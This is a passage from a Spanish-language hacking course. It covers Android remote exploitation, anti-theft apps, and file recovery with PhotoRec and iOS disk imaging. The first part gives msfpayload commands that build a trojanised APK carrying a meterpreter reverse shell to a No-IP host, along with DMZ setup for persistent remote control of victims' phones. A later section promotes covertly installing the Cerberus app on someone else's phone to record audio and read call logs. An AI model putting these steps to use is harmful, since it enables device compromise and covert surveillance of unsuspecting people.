Escojemos Permitir todas las Aplicaciones (modo DMZplus (Zona desmilitarizada), y damos aceptar.



Una vez hecho esto Reiniciamos el modem para que se apliquen los cambios.



Una vez reiniciado vamos a verificar que direccin ip tenemos con la ayuda de google y la siguiente pagina :

http://www.cual-es-mi-ip.net

Ahora Copiamos y pegamos en nuestro navegador , y por ejemplo en mi caso esta abierto el puerto para mi NAS.

Con esto ya tenemos todos los puertos abiertos , pero que pasa si reinicio mi modem y/o se va la luz? , es claro que la ip va a cambiar y la



explotacin remota ya no funcionara ya que el apk infectado apunta a una ip en especifico y como ya no tenemos esa ip apuntando hacia nuestra pc y modem , dejara de funcionar.

3.6.2.-Conociendo el Servicio No-ip + creacin y configuracin de nuestro modem

El Servicio no-ip nos proporciona un subdominio para poder utilizar nuestra ip , no importando si cambia.

El registro es bastante sencillo a travs de su pagina . http://www.noip.com Una vez registrado accede a add-host

Escoges el nombre ejemplo: apk_zombies y el subdominio que gustes del lado derecho y da clic en Add Host y listo ya tienes un subdominio gratis apuntando a tu ip y tu pc.



3.7.-Explotacion 100% remota.

Una vez que tenemos configurado el modem en modo DMZ y el servicio No-ip apuntando a nuestro modem y pc , vamos a crear el apk infectado .... Pero esta vez en vez de poner ip vamos a poner el subdominio de No-ip.

Una vez en la carpeta de instalacin de Metasploit usaremos el siguiente comando

./msfpayload android/meterpreter/reverse_tcp LHOST=IP_LOCAL/NO-IP LPORT=PUERTO R > /RUTA/nombre_de_la_app.apk

./msfpayload android/meterpreter/reverse_tcp LHOST=apk_zombies.dominio.noip.com LPORT=6789 R > /RUTA/hacking_mexico.apk

y listo seguimos los pasos anteriores.



TEMA 3 Protegiendo tu Android contra robo

Como algunos usuarios sabrn existen algunas apps dentro de la Play Store que sirven para proteger nuestro equipo Android contra prdida o robo dndonos una serie de opciones que nos permiten desde localizar geogrficamente nuestro Smartphone hasta borrarlo de forma remota.

En este caso hablar un poco sobre una aplicacin en especial que debido a su amplio repertorio de funciones nos podra llegar a servir en un momento determinado para fines no tan buenos como para los que fue creada. Su nombre es cerberus y est disponible de manera gratuita dentro de la Play Store.

Si nos ponemos a darle un recorrido a las funciones de la aplicacin podremos encontrar una amplia lista dentro de la que destacan: Tiene tres maneras de proteger su dispositivo:

- Via control remoto a travs de la pgina web www.cerberusapp.com

- Via control remoto a travs de de mensajes de textos SMS

- SIM Checker (para los dispositivos que tienen una tarjeta SIM): recibir automticamente alertas si alguien utiliza su telfono con una tarjeta SIM no autorizada

El control remoto le permite realizar muchas operaciones en el dispositivo, como:

- Localizar y rastrear su dispositivo

- Iniciar una fuerte alarma, incluso si el dispositivo est en modo silencioso



- Borra la memoria interna y de la tarjeta SD

- Ocultar Cerberus del menu de las aplicacines

- Bloquear el dispositivo con un cdigo

- Grabar audio desde el micrfono

- Obtener una lista de los ltimas llamadas enviadas y recibidas

- Obtener informacin sobre la red y el operador a cual el dispositivo est conectado

- Y mucho mas!

Sin embargo, todas estas funciones tan tiles no son grtis. El nico requerimiento para poder explotar todo el potencial de la aplicacin es mediante el NICO pago de 2.99 vendra siendo el equivalente a $54 pesos mexicanos, este ser el nico pago que se tendra que hacer para la creacin de la cuenta y esta es de por vida.

A continuacin se muestran algunos ejemplos de la app en accin.



Toda la informacin del dispositivo puede ser vista mediante la pgina web de www.cerberusapp.com y esta a su vez mandar correos al que se us para el registro

Ahora, que pasara si esta aplicacin se la instalaras al telfono de alguna persona cercana o no tan cercana a ti?

Te imaginas la serie de posibilidades que podras tener sobre un dispositivo de forma remota

Como he dicho anteriormente, las herramientas pueden ser utilizadas para buenos o malos fines, simplemente se trata de que tan creativo sea uno para lograr sus objetivos y la ingeniera social que apliquen.



MODULO 3: Recuperacin de datos mediante consola

1.-Conociendo el Software PhotoRec

Es un software diseado para recuperar archivos perdidos incluyendo videos, documentos y archivos de los discos duros y CDRoms as como imgenes perdidas (por eso el nombre PhotoRecovery) de las memorias de las cmaras fotogrficas, MP3 players, PenDrives, etc. PhotoRec ignora el sistema de archivos y hace una bsqueda profunda de los datos, funcionando incluso si su sistema de archivos est muy daado o ha sido re-formateado.



Disponiblidad :

2.-Instalacion y creacin de Alias (sistemas Operativos Basados en Unix)

Durante el curso se entrega el software photorec para su instalacin , solo de debe colocar en la carpeta deseada.

Ejemplo en OSX :



Como se observa fue colocada en la carpeta Aplicaciones de OSX Colocar la carpeta en la ruta deseada para su uso.

Ejecucin en Windows : Doble Click en photorec_win.exe (32 y 64 bits)

Ejecucin en OSX : ./photorec (estar Posicionado en la carpeta de instalacin)

Comando completo : MacBook-Pro-de-Gonzalo:photorec Drummerwolf$ sudo ./photorec

Ejecucin en Linux : en Unix/Linux/BSD, se necesita ser root para ejecutar PhotoRec (ej. sudo testdisk-6.9/linux/photorec_static)



Creacin de un alias (sistemas basados en unix)

Para la creacin de un alias se seguirn los mismos pasos de la pgina 33 que se usaron para la instalacin de adb bundle

3.-Perdiendo/Borrando Datos en una USB/HDD

Durante este ejercicio contamos con una Memoria USB marca Kingston y borraremos archivos dentro de ella.

borrndolos :



Consultora Hacking Mxico

4.-Analizando los USB montados en nuestras computadoras

Abrimos nuestra consola o terminal , y verificamos cual es el nombre que se le ha asignado a la usb :

Ejemplo en OSX :

MacBook-Pro-de-Gonzalo: $ df h

Nota : hay muchos comandos en internet , simplemente utilize el comando df-h para ver las particiones y verifico que esta Hm_USB es la que quiero testear.



Ejemplo en Linux :

Hay muchas maneras de hacerlo dependiendo la distribucin que tengas. En este caso hemos usado el comando mount y vemos los dispositivos montados por el sistema .

Ejemplo en Windows :

Tan sencillo como entrar > inicio > mi PC , y listamos las unidades ... con la vista



4.1.-Recuperando los Datos Sistemas basados en UNIX :

Abrimos nuestra terminal o consola y escribimos el alias que hemos asignado , si no hemos creado el alias pues solamente ejecutamos asi : ./photorec

En este ejemplo usare el comando photorec el cual corresponde al alias que yo he asignado. Enseguida deber aparecer una terminal como esta:

Como se puede Observar se listan los dispositivos USB y de Disco Duros conectados , previamente se ha observado la usb conectada y su nombre asignado.

En este ejemplo el nombre que se le ha asignado a la usb es : /dev/rdisk2 Seleccionamos el dispositivo con las flechas del teclado y damos enter para que se accion la opcin proceed:



A continuacin se nos despliega una pantalla similar a esta donde se nos detalla la tabla de particiones (fat32) que tiene y el nombre que le hemos asignado (IRAIS_MM).

Escogemos en la parte de abajo [Search].

Ahora se nos muestra una pantalla donde se nos pregunta el tipo de particin con la que cuenta la usb o el disco duro. Photorec necesita saber que particin tiene y nos muestra en la parte de arriba el tipo de particin que tiene , en este caso escogeremos FAT/NTFS/HFS+/ReiserFS/...



En la siguiente pantalla escogemos la opcin [Whole] para que busque en toda la particin del usb o disco duro.

Se nos preguntara donde deseamos que ponga los archivos recuperados. En este caso he preparado una carpeta llamada rescate_usb en mi disco duro secundario para que ah los deposite.

Para finaliza tecleamos la letra C para decirle al software que el destino es el correcto.

Y con esto empieza el Proceso de Recuperacin en Segundo Plano.



Solo nos resta esperar a que termine el Proceso por completo.

5.-Analisis de Datos Analizaremos los archivos recuperados. Directorios Recuperados

MP3 : Recuperados

Consultora Hacking Mxico

Imgenes Recuperadas :



Archivos Recuperados :

Archivos Compresos :



Windows : Ejecutamos photorec_win.exe

Practicamente son los mismos pasos que en los sistemas basados en UNIX as que seguiremos los pasos anteriores.



ANLISIS FORENSE A UN DISPOSITIVO iOS En la realizacin de esta prueba se utilizar un iPod touch 2g de 8gb de capacidad

Si has perdido archivos e informacin dentro de tu iOS es posible recuperarlas y lo nico que necesitaremos ser lo siguiente:

- Dispositivo iOS con Jailbreak - OpenSSH instalado en iOS - Terminal instalada en iOS - Servidor SSH instalado y configurado en tu computadora - Utilidad DD instalada en tu computadora (viene preinstalada en la mayora de los

sistemas basado en UNIX) - Photorec instalado en tu computadora - Conexin wifi

Pasos:

-Desactivamos el autolock en el dispositivo iOS (configuracin>general>Auto-lock>seleccionar nunca

-Conectamos nuestro iOS a su cargador de corriente

-Abrimos la terminal de nuestro iOS

-Usamos el comando su para tener permisos de superusuario

-Ejecutamos dd if=/dev/disk0 | ssh usuario@ip_computadora 'dd of=ipod.img'

-En donde usuario ser la cuenta de nuestra computadora que recibir el archivo

-Ip_computadora nuestra direccin ip



-Este comando es case sensitive, favor de introducirlo correctamente

-No confundan dd if= con dd of= de lo contrario podran reescribir la memoria de su iOS

-Una vez iniciado el proceso este puede tardar horas, ser cosa de ser paciente y esperar a que termine

En este caso se nos gener un archivo de imagen de 8gb aprox de tamao

Pasaremos a hacer el anlisis de la imagen de disco para lo cual teclearemos en nuestra consola (de forma directa si tenemos el alias de photorec previamente creado)

sudo photorec /ruta_del_archivo.img



Como se pueden dar cuenta, el proceso para recuperar los datos ser el mismo que utilizamos para el de una usb normal



Una vez finalizado el proceso tendremos nuestros archivos recuperados y solo necesitaremos analizarlos: